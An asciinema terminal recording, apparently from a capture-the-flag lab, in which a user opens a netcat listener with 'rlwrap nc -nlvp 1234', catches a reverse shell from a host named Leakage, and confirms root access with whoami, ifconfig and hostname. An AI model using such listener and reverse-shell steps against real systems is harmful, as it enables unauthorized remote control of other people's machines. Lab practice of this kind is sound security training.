{"version": 2, "width": 80, "height": 23, "timestamp": 1592458229, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.051924, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                               \r \r"]
[0.05254, "o", "\u001bk..rtress/akerva\u001b\\"]
[0.055255, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36makerva\u001b[00m \u001b[K"]
[0.05538, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.364462, "o", "asciinema rec"]
[0.518544, "o", "\u001b[13Drlwrap nc -nlvp 1234"]
[0.952813, "o", "\u001b[?1l\u001b>"]
[0.952884, "o", "\u001b[?2004l\r\r\n"]
[0.953156, "o", "\u001bkrlwrap\u001b\\"]
[0.95581, "o", "Ncat: Version 7.80 ( https://nmap.org/ncat )\r\r\n"]
[0.956922, "o", "Ncat: Listening on :::1234\r\r\nNcat: Listening on 0.0.0.0:1234\r\r\n"]
[0.998614, "o", "\r\r\u001b[K\r"]
[4.66409, "o", "Ncat: Connection from 10.13.37.11.\r\r\nNcat: Connection from 10.13.37.11:54526.\r\r\n"]
[4.665864, "o", "bash: cannot set terminal process group (1229): Inappropriate ioctl for device\r\r\n"]
[4.709553, "o", "\r\r\u001b[K\r"]
[4.984567, "o", "bash: no job control in this shell\r\r\nroot@Leakage:/tmp# "]
[5.036618, "o", "\r\r\u001b[K\rroot@Leakage:/tmp# "]
[5.945394, "o", "\r\r\u001b[K\r"]
[5.945446, "o", "root@Leakage:/tmp# "]
[5.945554, "o", "w"]
[6.145329, "o", "h"]
[6.401524, "o", "o"]
[6.761353, "o", "a"]
[6.921397, "o", "m"]
[7.1535, "o", "i"]
[7.401603, "o", "\b\b\b\b\b\b\u001b[K"]
[7.402816, "o", "whoami\r\r\n"]
[7.445312, "o", "\r\r\u001b[K\r"]
[7.864075, "o", "whoami"]
[7.906145, "o", "\r\r\u001b[K\rwhoami"]
[8.192182, "o", "\r\r\u001b[K\rwhoami\r\r\nroot\r\r\nroot@Leakage:/tmp# "]
[8.242007, "o", "\r\r\u001b[K\rroot@Leakage:/tmp# "]
[9.161557, "o", "\r\r\u001b[K\r"]
[9.161601, "o", "root@Leakage:/tmp# i"]
[9.377761, "o", "f"]
[9.673785, "o", "c"]
[9.905852, "o", "o"]
[10.185917, "o", "n"]
[10.561873, "o", "f"]
[10.706811, "o", "i"]
[10.88186, "o", "g"]
[11.602577, "o", "\b\b\b\b\b\b\b\b\u001b[K"]
[11.604089, "o", "ifconfig\r\r\n"]
[11.646795, "o", "\r\r\u001b[K\r"]
[12.024237, "o", "ifconfig"]
[12.065959, "o", "\r\r\u001b[K\rifconfig"]
[12.352239, "o", "\r\r\u001b[K\rifconfig\r\r\nens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\r\r\n        inet 10.13.37.11  netmask 255.255.255.0  broadcast 10.13.37.255\r\r\n        ether 00:50:56:b9:84:39  txqueuelen 1000  (Ethernet)\r\r\n        RX packets 1125  bytes 564027 (564.0 KB)\r\r\n        RX errors 0  dropped 2  overruns 0  frame 0\r\r\n        TX packets 1038  bytes 609760 (609.7 KB)\r\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\r\n\r\r\nlo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536\r\r\n        inet 127.0.0.1  netmask 255.0.0.0\r\r\n "]
[12.354053, "o", "       loop  txqueuelen 1000  (Local Loopback)\r\r\n        RX packets 10188  bytes 771876 (771.8 KB)\r\r\n        RX errors 0  dropped 0  overruns 0  frame 0\r\r\n        TX packets 10188  bytes 771876 (771.8 KB)\r\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\r\n\r\r\nroot@Leakage:/tmp# "]
[12.39696, "o", "\r\r\u001b[K\rroot@Leakage:/tmp# "]
[13.17839, "o", "\r\r\u001b[K\rroot@Leakage:/tmp# h"]
[13.442326, "o", "o"]
[13.642369, "o", "s"]
[13.882247, "o", "t"]
[14.298479, "o", "n"]
[14.427888, "o", "a"]
[14.562429, "o", "m"]
[14.69843, "o", "e"]
[15.250795, "o", "\b\b\b\b\b\b\b\b"]
[15.250951, "o", "\u001b[K"]
[15.252611, "o", "hostname\r\r\n"]
[15.300545, "o", "\r\r\u001b[K\r"]
[15.865749, "o", "hostname"]
[15.907656, "o", "\r\r\u001b[K\rhostname"]
[16.183196, "o", "\r\r\u001b[K\rhostname\r\r\nLeakage\r\r\nroot@Leakage:/tmp# "]
[16.226068, "o", "\r\r\u001b[K\rroot@Leakage:/tmp# "]
[17.135707, "o", "\r\n"]
[17.135785, "o", "\r\n"]
[17.135965, "o", "\u001b[1m\u001b[3m#\u001b[23m\u001b[1m\u001b[0m                                                                               \r \r\u001bk..rtress/akerva\u001b\\"]
[17.13887, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36makerva\u001b[00m \u001b[K"]
[17.138903, "o", "\u001b[?1h\u001b="]
[17.139002, "o", "\u001b[?2004h"]
[17.322939, "o", "\u001b[?2004l\r\r\n"]
